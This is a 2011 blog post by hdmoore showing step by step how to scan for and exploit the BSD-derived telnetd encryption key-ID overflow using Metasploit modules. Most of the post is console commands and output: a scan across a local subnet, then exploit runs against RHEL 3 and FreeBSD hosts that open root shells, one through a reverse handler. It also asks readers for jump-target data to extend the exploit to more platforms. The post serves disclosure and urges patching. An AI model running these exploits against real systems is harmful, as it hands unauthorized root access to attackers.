hdmoore

More Fun with BSD-derived Telnet Daemons

Blog Post created by hdmoore on Dec 28, 2011

In my last post, I discussed the recent BSD telnetd vulnerability and demonstrated the scanner module added to the Metasploit Framework. Since then, two new exploit modules have been released; one for FreeBSD versions 5.3 - 8.2 and another for Red Hat Enterprise Linux 3.

 

Starting with an updated copy of the Metasploit Framework, load the console and kick off the scanner:

 

$ msfconsole


msf> use auxiliary/scanner/telnet/telnet_encrypt_overflow

msf auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24

msf auxiliary(telnet_encrypt_overflow) > set THREADS 64

msf auxiliary(telnet_encrypt_overflow) > run

[+] 192.168.0.169:23 VULNERABLE: localhost.localdomain (Linux release 2.4.21-4.EL #1 ...

[+] 192.168.0.130:23 VULNERABLE: FreeBSD/i386 (freebsd.localdomain) (pts/0)\x0d\x0a\x0d\x0alogin:

[*] Auxiliary module execution completed

 

For the first target (Linux), we will choose the RHEL 3 exploit:

 

msf> use exploit/linux/telnet/telnet_encrypt_keyid

msf exploit(telnet_encrypt_keyid) > set RHOST 192.168.0.169

msf exploit(telnet_encrypt_keyid) > exploit

[*] Started bind handler

[*] Brute forcing with 1 possible targets

[*] Trying target Red Hat Enterprise Linux 3 (krb5-telnet)...

[*] Sending first payload

[*] Sending second payload...

[*] Sending stage (36 bytes) to 192.168.0.169

[*] Command shell session 1 opened

 

id

uid=0(root) gid=0(root)

^C

Abort session 1? [y/N] y

 

[*] Command shell session 1 closed.  Reason: User exit

 

Easy enough, now on to our FreeBSD target:

 

msf> use exploit/freebsd/telnet/telnet_encrypt_keyid

msf exploit(telnet_encrypt_keyid) > set RHOST 192.168.0.130

msf exploit(telnet_encrypt_keyid) > exploit

[*] Started reverse handler on 192.168.0.3:4444

[*] Brute forcing with 9 possible targets

[*] Trying target FreeBSD 8.2...

[*] Sending first payload

[*] Sending second payload...

[*] Command shell session 2 opened

 

id

uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

 

That about sums it up. If for some crazy reason you are running telnet on your BSD systems or have the bad luck to be using a BSD-derived telnet daemon on linux (such as krb5-telnet), patch or upgrade to SSH as soon as possible. If you would like to contribute a new exploit target for either Linux or Windows, all we typically need is the output of the following command:

 

$ msfelfscan -j edx /path/to/telnetd (msfelfscan is part of the Metasploit Framework)

 

The exploit is ridiculously simple and only a single jmp target is needed to add reliable targeting for a new platform. Supporting BSD variants such as Dragonfly, NetBSD, and so is likely to require no more effort than a new jmp target (assuming no major compiler changes).

 

Dan Rosenberg confirmed that BSD-derived telnet CLIENTS are vulnerable as well, but we have not added any exploits for the client side at this time. Thanks again to Brandon Perry for getting the ball rolling on the exploit code and testing against multiple targets.

 

-HD

Outcomes